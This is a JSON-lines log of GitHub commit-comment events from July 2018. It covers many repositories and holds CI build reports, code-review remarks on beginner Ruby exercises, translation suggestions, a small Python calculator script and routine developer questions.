{"id":"7998175352","type":"CommitCommentEvent","actor":{"login":"SangramP288"},"repo":{"name":"SangramP288/MavenTestNG"},"payload":{"comment":{"id":29787587,"position":null,"line":null,"path":null,"commit_id":"3b844c19417132b851f6dd6eb6f98ceaf40c2070","created_at":"2018-07-21T07:05:12Z","updated_at":"2018-07-21T07:05:12Z","author_association":"OWNER","body":"Random"}},"created_at":"2018-07-21T07:05:12Z"}
{"id":"7998177206","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787595,"position":null,"line":null,"path":null,"commit_id":"d994ff3b2ce0310f3e45687dc81a7a4352fc19bf","created_at":"2018-07-21T07:07:00Z","updated_at":"2018-07-21T07:07:00Z","author_association":"COLLABORATOR","body":"seitdem bitte seit dem (sind 2 Wörter)\r\nWobei im englischen string steht \"Haven't scanned device\" >> geht also auch einfach \"10 Tage Gerät nicht gescannt\" (nur ein Vorschlag)."}},"created_at":"2018-07-21T07:07:00Z"}
{"id":"7998178704","type":"CommitCommentEvent","actor":{"login":"Diphendara"},"repo":{"name":"jkutner/heroku-buildpack-minecraft"},"payload":{"comment":{"id":29787597,"position":null,"line":null,"path":null,"commit_id":"e0344bc9fcf732d2615d11dac22a11363f5191d1","created_at":"2018-07-21T07:08:31Z","updated_at":"2018-07-21T07:08:31Z","author_association":"NONE","body":"When i use `heroku config:set MINECRAFT_VERSION=\"1.13\"` and re-deploy the server i follow the readme and then in the minecraft just show \"old\" as version of the server"}},"created_at":"2018-07-21T07:08:31Z"}
{"id":"7998179238","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787598,"position":null,"line":null,"path":null,"commit_id":"d994ff3b2ce0310f3e45687dc81a7a4352fc19bf","created_at":"2018-07-21T07:09:05Z","updated_at":"2018-07-21T07:09:05Z","author_association":"COLLABORATOR","body":",,,,,, "}},"created_at":"2018-07-21T07:09:05Z"}
{"id":"7998180115","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787599,"position":null,"line":null,"path":null,"commit_id":"d994ff3b2ce0310f3e45687dc81a7a4352fc19bf","created_at":"2018-07-21T07:09:56Z","updated_at":"2018-07-21T07:09:56Z","author_association":"COLLABORATOR","body":"?"}},"created_at":"2018-07-21T07:09:56Z"}
{"id":"7998181112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787601,"position":null,"line":null,"path":null,"commit_id":"b610295505df1ba95ce79cfc5cd43a92730b6b5a","created_at":"2018-07-21T07:10:52Z","updated_at":"2018-07-21T07:10:52Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2325 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-21T07:10:52Z"}
{"id":"7998182276","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29787605,"position":null,"line":null,"path":null,"commit_id":"136cbcb07fc8cd3f87777fee69987e7c51489621","created_at":"2018-07-21T07:12:03Z","updated_at":"2018-07-21T07:12:03Z","author_association":"OWNER","body":"### 简易计算器，可进行含多重括号的初等运算的算式计算\r\n```\r\n#Downtiser\r\nimport re\r\n\r\ndef bracket(formula):\r\n    '''\r\n    to return the innermost bracket's formula\r\n    :param formula:\r\n    :return:\r\n    '''\r\n    if '(' in formula:\r\n        new_formula=re.search('\\(((\\d|(\\d\\.\\d+))|-|\\*|/|\\+)+\\)',formula)\r\n        sub_formula=new_formula.group()[1:-1]\r\n        return sub_formula\r\n\r\n\r\n\r\ndef multiply_divide(formula):\r\n    '''\r\n    from the none bracket formula to select the multiply or divide formula only, then calculate it and replace\r\n    the formula with the result\r\n    :param formula:\r\n    :return:\r\n    '''\r\n\r\n    new_formula = re.search('(-?\\d+)(\\.\\d+)?(\\*|/)((\\*-)|(/-)|\\*|/|\\d)*(-?\\d+)(\\.\\d+)?',formula)\r\n\r\n    new_formula2=re.split('\\*|/',new_formula.group())\r\n    sum = float(new_formula2[0])\r\n    j = 1\r\n    for i in new_formula.group():\r\n        if i == '/':\r\n            sum = sum / float(new_formula2[j])\r\n            j += 1\r\n        elif i == '*':\r\n            sum = sum * float(new_formula2[j])\r\n            j += 1\r\n    if sum>=0:\r\n        after_modify = re.sub('(-?\\d+)(\\.\\d+)?(\\*|/)((\\*-)|(/-)|\\*|/|\\d)*(-?\\d+)(\\.\\d+)?', '+' + str(sum), formula,count=1)\r\n        after_modify=re.sub('(--)|(\\+\\+)', '+',after_modify)\r\n        after_modify=re.sub('(-\\+)|(\\+-)', '-',after_modify)\r\n\r\n    else:\r\n        after_modify = re.sub('(-?\\d+)(\\.\\d+)?(\\*|/)((\\*-)|(/-)|\\*|/|\\d)*(-?\\d+)(\\.\\d+)?',str(sum), formula,count=1)\r\n        after_modify = re.sub('(--)|(\\+\\+)', '+', after_modify)\r\n        after_modify = re.sub('(-\\+)|(\\+-)', '-', after_modify)\r\n\r\n    return after_modify\r\n\r\ndef plus_minus(formula):\r\n    '''\r\n    from the formula without bracket and '*' or '/' to get the result of it, then\r\n    return the result\r\n    :param formula:\r\n    :return:\r\n    '''\r\n    res1 = re.sub('(--)|(\\+\\+)', '+', formula)\r\n\r\n    res2 = re.sub('(-\\+)|(\\+-)', '-', res1)\r\n\r\n    if res2[0] == '+':\r\n        res2 = res2[1:]\r\n    fin_dig1 = re.findall('-?\\d+\\.\\d+', res2)\r\n    res3 = re.sub('-?\\d+\\.\\d+', '', res2)\r\n    fin_dig2 = re.findall('-?\\d+', res3)\r\n    sum = 0\r\n    for i in fin_dig1:\r\n        sum += float(i)\r\n    for i in fin_dig2:\r\n        sum += float(i)\r\n\r\n    return round(sum,6)\r\n\r\n\r\nwhile True:\r\n    sum=0\r\n    user_choice=input('input q to quit or input any other value to continue>>>')\r\n    formula=input('please input the formula you want to calculate>>>')\r\n    formula=formula.replace(' ','')\r\n    if user_choice=='q':\r\n        exit('quit successfully!')\r\n\r\n    while '(' in formula:\r\n        sub_formula=bracket(formula)\r\n        while '/'in sub_formula or '*' in sub_formula:\r\n            sub_formula=multiply_divide(sub_formula)\r\n            if '/' not in sub_formula and '*' not in sub_formula:\r\n                break\r\n        sum=sum+plus_minus(sub_formula)\r\n        formula=re.sub('\\(((\\d|(\\d\\.\\d+))|-|\\*|/|\\+)+\\)',str(sum),formula,count=1)\r\n        sum=0\r\n        if '(' not in formula:\r\n            break\r\n    while '/' in formula or '*' in formula:\r\n        formula=multiply_divide(formula)\r\n        if '/' not in formula and '*' not in formula:\r\n            break\r\n\r\n\r\n    res = plus_minus(formula)\r\n    print(res)\r\n\r\n```"}},"created_at":"2018-07-21T07:12:03Z"}
{"id":"7998182552","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787606,"position":null,"line":null,"path":null,"commit_id":"b610295505df1ba95ce79cfc5cd43a92730b6b5a","created_at":"2018-07-21T07:12:19Z","updated_at":"2018-07-21T07:12:19Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T07:12:19Z"}
{"id":"7998183034","type":"CommitCommentEvent","actor":{"login":"Llewellynvdm"},"repo":{"name":"vdm-io/Joomla-Component-Builder"},"payload":{"comment":{"id":29787610,"position":46,"line":2321,"path":"admin/helpers/compiler/c_Fields.php","commit_id":"6dd654c745a0d53e97162a4522e2eccb5aabb104","created_at":"2018-07-21T07:12:46Z","updated_at":"2018-07-21T07:12:46Z","author_association":"MEMBER","body":"gh-322 has been fixed, please test and let me know"}},"created_at":"2018-07-21T07:12:46Z"}
{"id":"7998183790","type":"CommitCommentEvent","actor":{"login":"PiCob"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29787612,"position":null,"line":null,"path":null,"commit_id":"6a090bd5f1d78ee1cf144a93644f4ddb93a5ab83","created_at":"2018-07-21T07:13:32Z","updated_at":"2018-07-21T07:13:32Z","author_association":"NONE","body":"Nope, using default (\"normal\") font size.\n\nAm 21. Juli 2018, 08:32, um 08:32, Greyson Parrelli <notifications@github.com> schrieb:\n>@PiCob Are you using a non-default font size? Using a big font can make\n>the compose box taller.\n>\n>-- \n>You are receiving this because you were mentioned.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/signalapp/Signal-Android/commit/6a090bd5f1d78ee1cf144a93644f4ddb93a5ab83#commitcomment-29787461\n\n"}},"created_at":"2018-07-21T07:13:32Z"}
{"id":"7998183931","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29787613,"position":null,"line":null,"path":null,"commit_id":"c1ff89a9f56aaaa08f14aba7ee5676244e88eca6","created_at":"2018-07-21T07:13:40Z","updated_at":"2018-07-21T07:13:40Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 48](https://teamcity.otenv.com/viewLog.html?buildId=8980509&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:13:33"}},"created_at":"2018-07-21T07:13:40Z"}
{"id":"7998186189","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29787619,"position":9,"line":17,"path":"vowels.rb","commit_id":"4e483363a7a564df7cee148eee4e839d8c135764","created_at":"2018-07-21T07:15:40Z","updated_at":"2018-07-21T07:15:40Z","author_association":"NONE","body":"vowels = [] не используется\r\n\r\n\r\nвот тут нет нормальных отступов, \r\n```\r\nif a != value.scan(/[aeouiy]/)\r\n# vowels_hash.merge!(value.scan(/[aeouiy]/)[0] => index)\r\nvowels_hash[value] = index    \r\nend\r\n```\r\n\r\nплюс не надо мусор оставлять \r\n"}},"created_at":"2018-07-21T07:15:40Z"}
{"id":"7998187672","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29787624,"position":null,"line":null,"path":null,"commit_id":"e99302429556b42e0d68071c0b1204917b0c5efe","created_at":"2018-07-21T07:16:54Z","updated_at":"2018-07-21T07:16:54Z","author_association":"CONTRIBUTOR","body":"The count of slurs attached to the chords was being used instead of the count of notes in the chords for `notecount`."}},"created_at":"2018-07-21T07:16:54Z"}
{"id":"7998188519","type":"CommitCommentEvent","actor":{"login":"trommler"},"repo":{"name":"trommler/ghc"},"payload":{"comment":{"id":29787625,"position":39,"line":39,"path":"libraries/ghc-heap/GHC/Exts/Heap/InfoTable.hsc","commit_id":"ec22f7ddc81b40a9dbcf140e5cf44730cb776d00","created_at":"2018-07-21T07:17:42Z","updated_at":"2018-07-21T07:17:42Z","author_association":"OWNER","body":"Is tipe' a HalfWord? Do we have another endianness issue here?"}},"created_at":"2018-07-21T07:17:42Z"}
{"id":"7998188655","type":"CommitCommentEvent","actor":{"login":"SanteriVahos"},"repo":{"name":"SanteriVahos/BacodeScannerProject"},"payload":{"comment":{"id":29787626,"position":3,"line":3,"path":"Data.py","commit_id":"752bd43cb2cab83b55878abbc97970b670b05946","created_at":"2018-07-21T07:17:50Z","updated_at":"2018-07-21T07:17:50Z","author_association":"OWNER","body":"Tämä puuttui aikaisemmin ja aiheutti kaatumisen\r\n"}},"created_at":"2018-07-21T07:17:50Z"}
{"id":"7998192713","type":"CommitCommentEvent","actor":{"login":"shufei021"},"repo":{"name":"shufei021/date-"},"payload":{"comment":{"id":29787636,"position":null,"line":null,"path":null,"commit_id":"a348303bc202583ae319b42dccf4db9672c0ae77","created_at":"2018-07-21T07:21:31Z","updated_at":"2018-07-21T07:21:31Z","author_association":"OWNER","body":"日期时间"}},"created_at":"2018-07-21T07:21:31Z"}
{"id":"7998193869","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29787639,"position":null,"line":null,"path":null,"commit_id":"bbfb764647e46dedb81283f89836deaba4f96f68","created_at":"2018-07-21T07:22:31Z","updated_at":"2018-07-21T07:22:31Z","author_association":"MEMBER","body":"Once again, @briantro please read your diffs before committing/pushing.  Two commits for a single comment change is completely unnecessary revision churn."}},"created_at":"2018-07-21T07:22:31Z"}
{"id":"7998201398","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29787652,"position":3,"line":3,"path":"lesson2/fib_100.rb","commit_id":"7f78eb89d4bcd0fe4bd084e555ea67af61f8d8e2","created_at":"2018-07-21T07:29:34Z","updated_at":"2018-07-21T07:29:34Z","author_association":"NONE","body":"там ты получишь первые 98 чисел, а надо получить число меньшие 100. \r\n(к слову последний полученный тобой элемент массива будет равен 354224848179261915075)"}},"created_at":"2018-07-21T07:29:34Z"}
{"id":"7998201573","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29787653,"position":null,"line":null,"path":null,"commit_id":"c1ff89a9f56aaaa08f14aba7ee5676244e88eca6","created_at":"2018-07-21T07:29:44Z","updated_at":"2018-07-21T07:29:44Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 49](https://teamcity.otenv.com/viewLog.html?buildId=8980623&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:16:01"}},"created_at":"2018-07-21T07:29:44Z"}
{"id":"7998202406","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29787658,"position":3,"line":3,"path":"lesson2/days_from_start.rb","commit_id":"7f78eb89d4bcd0fe4bd084e555ea67af61f8d8e2","created_at":"2018-07-21T07:30:20Z","updated_at":"2018-07-21T07:30:20Z","author_association":"NONE","body":"Названия месяцев почти используются, можно сделать про array с числом дней в месяце\r\nmonths[\"Февраль\"] = 29 if is_leap\r\nпридется переписать на \r\nmonths[1] = 29 if is_leap\r\n\r\nи все. И не придется hash превращать с массив, потом брать второй элемент из вложенного массива и т.д.\r\n\r\nМожно будет использовать array.sum, ну и вообще код будет чище\r\n\r\n\r\n"}},"created_at":"2018-07-21T07:30:20Z"}
{"id":"7998203001","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"fenneclab/hugo-bin"},"payload":{"comment":{"id":29787659,"position":null,"line":null,"path":null,"commit_id":"7ff974e6bcd861146b1005ca788d4febc01081ef","created_at":"2018-07-21T07:30:48Z","updated_at":"2018-07-21T07:30:48Z","author_association":"CONTRIBUTOR","body":"@satoshun00: I wouldn't have made this a patch release because of the node.js 4.x drop."}},"created_at":"2018-07-21T07:30:48Z"}
{"id":"7998203711","type":"CommitCommentEvent","actor":{"login":"greyson-signal"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29787661,"position":null,"line":null,"path":null,"commit_id":"6a090bd5f1d78ee1cf144a93644f4ddb93a5ab83","created_at":"2018-07-21T07:31:28Z","updated_at":"2018-07-21T07:31:28Z","author_association":"CONTRIBUTOR","body":"Open a ticket with a screenshot if you get the chance."}},"created_at":"2018-07-21T07:31:28Z"}
{"id":"7998206024","type":"CommitCommentEvent","actor":{"login":"KTOmega"},"repo":{"name":"OASTEM/VisionProcessing"},"payload":{"comment":{"id":29787664,"position":null,"line":null,"path":null,"commit_id":"00bd92a2c1e5053ec4e7a7e103edbeab992b9255","created_at":"2018-07-21T07:33:35Z","updated_at":"2018-07-21T07:33:35Z","author_association":"MEMBER","body":"lol"}},"created_at":"2018-07-21T07:33:35Z"}
{"id":"7998211255","type":"CommitCommentEvent","actor":{"login":"zwcloud"},"repo":{"name":"zwcloud/ImGui"},"payload":{"comment":{"id":29787674,"position":null,"line":null,"path":null,"commit_id":"c0f0cbeca850955d6f332a876560c5c0d03e42b8","created_at":"2018-07-21T07:38:12Z","updated_at":"2018-07-21T07:38:12Z","author_association":"OWNER","body":"**DrawOneTextNode**\r\n![image](https://user-images.githubusercontent.com/6965758/43033363-adf14594-8cfb-11e8-82f8-5bb83e37d167.png)\r\nCorrect.\r\n\r\n**DrawTwoTextNode**\r\n![image](https://user-images.githubusercontent.com/6965758/43033366-c24c19e2-8cfb-11e8-8a58-dff020b789bf.png)\r\nIncorrect. The result should be:\r\n```\r\nAAA\r\nB\r\n```\r\n\r\nThere's probably something wrong happened when merging the TextMeshs of `AAA` and `B`.\r\n"}},"created_at":"2018-07-21T07:38:12Z"}
{"id":"7998212500","type":"CommitCommentEvent","actor":{"login":"satoshun00"},"repo":{"name":"fenneclab/hugo-bin"},"payload":{"comment":{"id":29787676,"position":null,"line":null,"path":null,"commit_id":"7ff974e6bcd861146b1005ca788d4febc01081ef","created_at":"2018-07-21T07:39:21Z","updated_at":"2018-07-21T07:39:21Z","author_association":"MEMBER","body":"Sorry. This is my fault.\r\nI've stopped publication of v0.29.1"}},"created_at":"2018-07-21T07:39:21Z"}
{"id":"7998212675","type":"CommitCommentEvent","actor":{"login":"xuyinlei"},"repo":{"name":"xuyinlei/git_home"},"payload":{"comment":{"id":29787678,"position":null,"line":null,"path":null,"commit_id":"d66408c0a852d8e31ff41f916c41533d4afd29da","created_at":"2018-07-21T07:39:31Z","updated_at":"2018-07-21T07:39:31Z","author_association":"OWNER","body":"dd"}},"created_at":"2018-07-21T07:39:31Z"}
{"id":"7998213401","type":"CommitCommentEvent","actor":{"login":"wingsico"},"repo":{"name":"umijs/umi-dva-user-dashboard"},"payload":{"comment":{"id":29787679,"position":23,"line":23,"path":"src/layouts/Header.js","commit_id":"2c763479762ed9fb16e151d362df2b8d68631cd0","created_at":"2018-07-21T07:40:10Z","updated_at":"2018-07-21T07:40:10Z","author_association":"NONE","body":"这个404无法匹配到，pathname 是下面的那个路径，没有选中效果"}},"created_at":"2018-07-21T07:40:10Z"}
{"id":"7998214570","type":"CommitCommentEvent","actor":{"login":"DhirajSurvase"},"repo":{"name":"LineageOS-MediaTek/android_device_mediatek_mt6737-common"},"payload":{"comment":{"id":29787680,"position":null,"line":null,"path":null,"commit_id":"70c34475d762c1e1867dad3b8af69a3e50fcaec0","created_at":"2018-07-21T07:41:12Z","updated_at":"2018-07-21T07:41:12Z","author_association":"MEMBER","body":"<<<<Worked?>>>>"}},"created_at":"2018-07-21T07:41:12Z"}
{"id":"7998214580","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"fenneclab/hugo-bin"},"payload":{"comment":{"id":29787681,"position":null,"line":null,"path":null,"commit_id":"7ff974e6bcd861146b1005ca788d4febc01081ef","created_at":"2018-07-21T07:41:12Z","updated_at":"2018-07-21T07:41:12Z","author_association":"CONTRIBUTOR","body":"NP, all good now :)"}},"created_at":"2018-07-21T07:41:12Z"}
{"id":"7998217654","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787685,"position":21,"line":21,"path":"lesson2/1_days_number.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:43:57Z","updated_at":"2018-07-21T07:43:57Z","author_association":"NONE","body":"надо выводить названия месяцев"}},"created_at":"2018-07-21T07:43:57Z"}
{"id":"7998218343","type":"CommitCommentEvent","actor":{"login":"armujahid"},"repo":{"name":"lavas-project/jekyll-pwa"},"payload":{"comment":{"id":29787686,"position":null,"line":null,"path":null,"commit_id":"c7fa9e7d911232b9966ff37a4ce06c457d47cd5f","created_at":"2018-07-21T07:44:34Z","updated_at":"2018-07-21T07:44:34Z","author_association":"NONE","body":"Do we need to manually update version in service-worker.js after every change in precache files?\r\nI am asking this because in previous version of jekyll-pwa, service-worker.js was generating automatically with updated version. "}},"created_at":"2018-07-21T07:44:34Z"}
{"id":"7998218833","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29787689,"position":null,"line":null,"path":null,"commit_id":"c1ff89a9f56aaaa08f14aba7ee5676244e88eca6","created_at":"2018-07-21T07:45:06Z","updated_at":"2018-07-21T07:45:06Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 50](https://teamcity.otenv.com/viewLog.html?buildId=8980631&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:15:21"}},"created_at":"2018-07-21T07:45:06Z"}
{"id":"7998219532","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787695,"position":10,"line":10,"path":"lesson2/2_array_10_to_100.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:45:40Z","updated_at":"2018-07-21T07:45:40Z","author_association":"NONE","body":"не забываем про пустую строку \r\nвот еще два способа сделать тоже самое\r\n\r\n`(10..100).step(5).to_a`\r\n`(2..20).map{|x| x * 5}`"}},"created_at":"2018-07-21T07:45:40Z"}
{"id":"7998220368","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787696,"position":15,"line":15,"path":"lesson2/3_fibonacci.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:46:28Z","updated_at":"2018-07-21T07:46:28Z","author_association":"NONE","body":"чуть чуть сложновато, можно arr сделать [0, 1] и тогда можно будет обойтись без def next_value"}},"created_at":"2018-07-21T07:46:28Z"}
{"id":"7998220454","type":"CommitCommentEvent","actor":{"login":"EsromTech"},"repo":{"name":"ToxycOS/android_frameworks_base"},"payload":{"comment":{"id":29787697,"position":22,"line":0,"path":"core/res/res/values-pt-rBR/toxyc_strings.xml","commit_id":"069315ce1dea318e7c9fa2494ab65596bacdfe04","created_at":"2018-07-21T07:46:32Z","updated_at":"2018-07-21T07:46:32Z","author_association":"NONE","body":"Y"}},"created_at":"2018-07-21T07:46:32Z"}
{"id":"7998220651","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29787698,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-21T07:46:42Z","updated_at":"2018-07-21T07:46:42Z","author_association":"NONE","body":"brother ???\n\nBilal Tariq!!!!\n\n\nOn Fri, Jul 20, 2018 at 2:52 PM Bilal Tariq <bilaltariq2122@gmail.com>\nwrote:\n\n> you plz guide me or help me to to create .mat file for this project and\n> help me so that i can run this project.\n> and find human age and gender estimation.\n> a lot of bundles for u.\n> Bilal Tariq!!!!\n>\n>\n> On Fri, Jul 20, 2018 at 2:51 PM Bilal Tariq <bilaltariq2122@gmail.com>\n> wrote:\n>\n>> you are right but how can i create .mat file for this project\n>> Bilal Tariq!!!!\n>>\n>>\n>> On Fri, Jul 20, 2018 at 10:23 AM Part Gadoya <notifications@github.com>\n>> wrote:\n>>\n>>> Hi,\n>>>\n>>> I have worked on this project around 2 months back and on college local\n>>> PC.\n>>> And I am currently out of station and don't have access to that PC. I may\n>>> not be able to give those files currently.\n>>>\n>>> But main code is \"bif.m\", other files are not much tough to code, you can\n>>> easily get help from matlab standard functions (kpls) and create basic\n>>> loop\n>>> for training and testing purposes. And you are done.\n>>>\n>>> Thanks with regards,\n>>> Parth Gadoya\n>>>\n>>> —\n>>> You are receiving this because you commented.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation/commit/2d9977cd4ad365ba7b7c946bce86ab924abf94e7#commitcomment-29774152>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AidTJ_XccBzUTGX2EgLjxursaddlJgo8ks5uIWlYgaJpZM4VXAP_>\n>>> .\n>>>\n>>\n"}},"created_at":"2018-07-21T07:46:42Z"}
{"id":"7998220762","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787699,"position":15,"line":15,"path":"lesson2/3_fibonacci.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:46:48Z","updated_at":"2018-07-21T07:46:48Z","author_association":"NONE","body":"и не забываем про пустую строку в конце файла\r\n(настрой себе редактор, чтобы он сам ставил ее)"}},"created_at":"2018-07-21T07:46:48Z"}
{"id":"7998221650","type":"CommitCommentEvent","actor":{"login":"bfredl"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29787701,"position":33,"line":51,"path":"runtime/lua/tycho/init.lua","commit_id":"92cd1930bb9b023f15de263c2d6155f8903999b4","created_at":"2018-07-21T07:47:40Z","updated_at":"2018-07-21T07:47:40Z","author_association":"MEMBER","body":"@KillTheMule To avoid quoting isssues you could use `nvim_set_var(\"tycho_dbg\", require(\"inspect\")(...))` and then `nvim_command(\"put =tycho_dbg\")`. Note also that `nvim_input` is async (basically all input is queued and executed first when lua returns back to user normal mode) and will not always behave as expected."}},"created_at":"2018-07-21T07:47:40Z"}
{"id":"7998221835","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787702,"position":12,"line":12,"path":"lesson2/4_vowels.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:47:49Z","updated_at":"2018-07-21T07:47:49Z","author_association":"NONE","body":"а вот тут эти порядковые номера надо вычислить) \r\nвсе что тебе дано - это массив гласных букв\r\nvowels = ['a', 'e', ...]\r\n"}},"created_at":"2018-07-21T07:47:49Z"}
{"id":"7998223360","type":"CommitCommentEvent","actor":{"login":"damarlas"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29787704,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-21T07:49:14Z","updated_at":"2018-07-21T07:49:14Z","author_association":"NONE","body":"Hi RyanFlemming thanks for replying, yes exactly I followed him, not only him, also other friends's hint above also, but still i have zhis problem, non of my link work Non of them , I press Customer, I recieve error, i press Movies I recieve errror, respectively in the below photo.\r\n![customer](https://user-images.githubusercontent.com/7737774/43033462-3441d59a-8ccb-11e8-92c0-98c44d7fd66d.PNG)\r\n![movie](https://user-images.githubusercontent.com/7737774/43033471-50301d8e-8ccb-11e8-9cfc-f8891c75ba73.PNG)\r\n\r\n"}},"created_at":"2018-07-21T07:49:14Z"}
{"id":"7998224085","type":"CommitCommentEvent","actor":{"login":"Sovent"},"repo":{"name":"dedalexij/MessageManager"},"payload":{"comment":{"id":29787707,"position":8,"line":7,"path":"MessageManager/MessageManager/Models/MessageModels/EmailModel.cs","commit_id":"f54ee75638ebbe50bc2187e4fe0ea2be43cd43ab","created_at":"2018-07-21T07:49:54Z","updated_at":"2018-07-21T07:49:54Z","author_association":"NONE","body":"если у класса приватные сеттеры и нет конструктора, значит инициализировать его свойства можно только через рефлексию. а её не нужно применять, если можно не применять."}},"created_at":"2018-07-21T07:49:54Z"}
{"id":"7998224819","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787710,"position":50,"line":50,"path":"lesson2/5_day_number.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:50:33Z","updated_at":"2018-07-21T07:50:33Z","author_association":"NONE","body":"ошибка\r\n```\r\n   \r\nEnter the year:\r\n 1\r\nEnter the month:\r\n 1\r\nEnter the day:\r\n 1\r\n32\r\n=> nil\r\n   \r\n```"}},"created_at":"2018-07-21T07:50:33Z"}
